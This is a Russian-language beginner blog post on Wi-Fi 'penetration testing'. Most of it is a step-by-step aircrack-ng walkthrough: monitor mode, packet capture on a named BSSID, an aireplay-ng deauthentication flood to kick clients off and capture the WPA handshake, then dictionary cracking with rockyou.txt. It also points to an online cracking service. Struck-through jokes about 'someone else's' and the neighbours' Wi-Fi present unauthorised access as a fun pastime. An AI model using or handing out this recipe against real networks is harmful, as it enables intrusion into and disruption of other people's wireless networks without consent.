Введение 1.2

Введение 1.2



Важная информация про админов — они болеют короной, но стойко делают вид, что еще живы. Так или иначе, на ближайшее время посты буду выпускать я.

Поскольку я прекрасно понимаю, что учить что-то просто так и не видеть никаких результатов сложно, мы немного зайдем вперед и посмотрим на тестирование на проникновение Wi-Fi. Тема дико заезженная, информации в сети о ней тонны, но для начала своего пути и просто подогреть интерес совсем новичков вполне подойдет. Да и самому себя защитить никогда не будет лишним, а когда мы дойдем до атак в локальной сети, получение доступа к ̶ч̶у̶ж̶о̶м̶у̶ Wi-Fi станет самым настоящим подарком и веселым времяпровождением на пару вечеров.

Для начала давайте разберемся о самых основных понятиях и терминах.

Бывают такие типы защиты Wi-Fi:

WEP - очень старый, практически не испульзуемый в реальном мире протокол. Уязвимый до жути, множество автоматических утилит для его взлома. Толку заострять на нем внимание не вижу - сомневаюсь что вы вообще его хоть когда-то увидите. А если увидели у себя... Ну в общем вы поняли.

WPS - тоже старая штука. Это возможность настройки роутера удаленно. Как не странно, тоже довольно уязвимая. Ей сделали патч несколько лет назад, но нормальные люди выключают ее всегда. Ее я так-же долго разбирать смысла не вижу - новые роутеры от атак на нее защищены. Если увидели - читайте по поводу атаки PixieDust.

WPA - современный протокол безопасности, использует трехстороннее рукопожатие (дальше подробнее).

WPA2 - то же, что и предыдущее, но шифрование в нем реально годное - AES.

Скорее всего ̶с̶о̶с̶е̶д̶и̶ тестируемые точки будут иметь WPA, так что про него и поговорим.

Трехстороннее рукопожатие, aka хендшейк выглядит примерно так


На человеческий можно перевести как разговор двух человек:

-Привет, можно зайти?

-Да, заходи

-Захожу

Именно этот "разговор" нам и нужно будет перехватить, что-бы расшифровать его.

Но тут встает первая проблема: рукопожатие можно перехватить только при подключении нового пользователя к сети. Например: вышел из дома с телефоном, вернулся, телефон подключился к сети - именно в этот момент и есть возможность перехватить рукопожатие. Не ждать же нам когда это произойдет. Для этого нужно будет провести атаку деаутентификации. Я немного забегаю вперед, но это нужно для понимания самого процесса.

Только понимая программу/сеть/etc лучше ее хозяина, можно получить к ней доступ (с) Джейсон С.

Начнем с самого начала. Нам нужно узнать как именно называется интерфейс, через который мы подключены к сети. После его нужно будет перевести в состояние мониторинга. И вот тут могут быть реальные проблемы - не каждая сетевая карта такое умеет, большенство ноутбуков все-таки должны справиться. В противном случае нужно будет купить внешний адаптер. Совсем мажоры побегут покупать Альфу, но сейчас нам не дальность нужна, так что подойдет любая, даже самая дешевая - главное что-бы умела мониторить. ̶У̶ ̶п̶р̶о̶д̶а̶в̶ц̶а̶ ̶я̶ ̶б̶ы̶ ̶т̶а̶к̶о̶е̶ ̶н̶е̶ ̶с̶п̶р̶а̶ш̶и̶в̶а̶л̶

Вводим команду:

ifconfig

Увидеть должны примерно следущее


Сейчас мы открыли конфигурацию интерфейса

Давайте учиться читать что в нем написано

eth0 - кабелоное подключение, оно же ethernet

l0 - Loopback интерфейс, типо локальной (неправильный термин, это сеть самого компа. Не знаю как правильно его назвать на русском) сети.

wlan0 - беспроводная сеть, она нам и нужна.

В данном примере она имеет номер 0.

(В программировании все начинается с 0, так что сервер1 по факту будет вторым сервером, так как был еще сервер0, который и был первым)

Тормозим все процессы, которые сейчас используют сеть

airmon-ng check kill

Процессы убили, можем переходить дальше.

Поднимаем карту в режиме мониторинга

airmon-ng start wlan0


В этом режиме подключиться к вайфаю уже не выйдет, так как карта выполняет другую функцию.

Теперь нужно просканировать все сети

airodump-ng wlan0mon
airodump-ng - название утилиты
wlan0mon - новый веб интерфейс, проверить его новое название можно открыв конфигурацию интерфейса.

Примерно такой вывод мы должны были получить.

Когда наберется достаточно сетей нажимаем Ctrl+C

(знак + означает одновременное нажатие клавиш)

Находим нужную нам точку доступа.

airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon
  • airodump-ng : перехватываем пакеты
  • -c : Канал
  • –bssid : MAC адрес точки доступа.
  • -w : директория, куда сохраняем.
  • wlan0mon : имя интерфейса.

Открываем новый терминал, этот оставляем работать. Сейчас нужно будет выбить из сети клиента, что-бы он смог снова подключиться и мы могли перехватить хендшейк.

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon
  • aireplay-ng : тулза для иньекции
  • -0 : деаутентификация
  • 10 : кол-во пакетов, которые нужно будет отправить
  • -a : bssid сети
  • wlan0mon : имя интерфейса.

Жмем ввод и возвращаемся к прошлому окну терминала. Ждем пока увидим вот это:

Вот мы и перехватили этот хендшейк. Сохранен он как файл с расшерение .сар, так что нужно его найти. Теперь расшифруем его.

aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap
  • aircrack-ng : программа для кряка ключей
  • -a : -a2 для WPA2 и -a для WPA
  • -b : BSSID сети
  • -w : путь к словарю. Лучший словарь в Кали лежит по пути /usr/share/wordlists/rockyou.txt
  • /root/hacking-01.cap : Путь к .сар файлу

Теперь просто ждем когда будут проверены все варианты. Если в словаре будет правильный пароль то увидите примерно этоЖ

Занять это может много времени и жужжать комп будет как вертолет, так что советую использовать онлайн-сервисы для этого. Я использую https://wpa-sec.stanev.org/


Report Page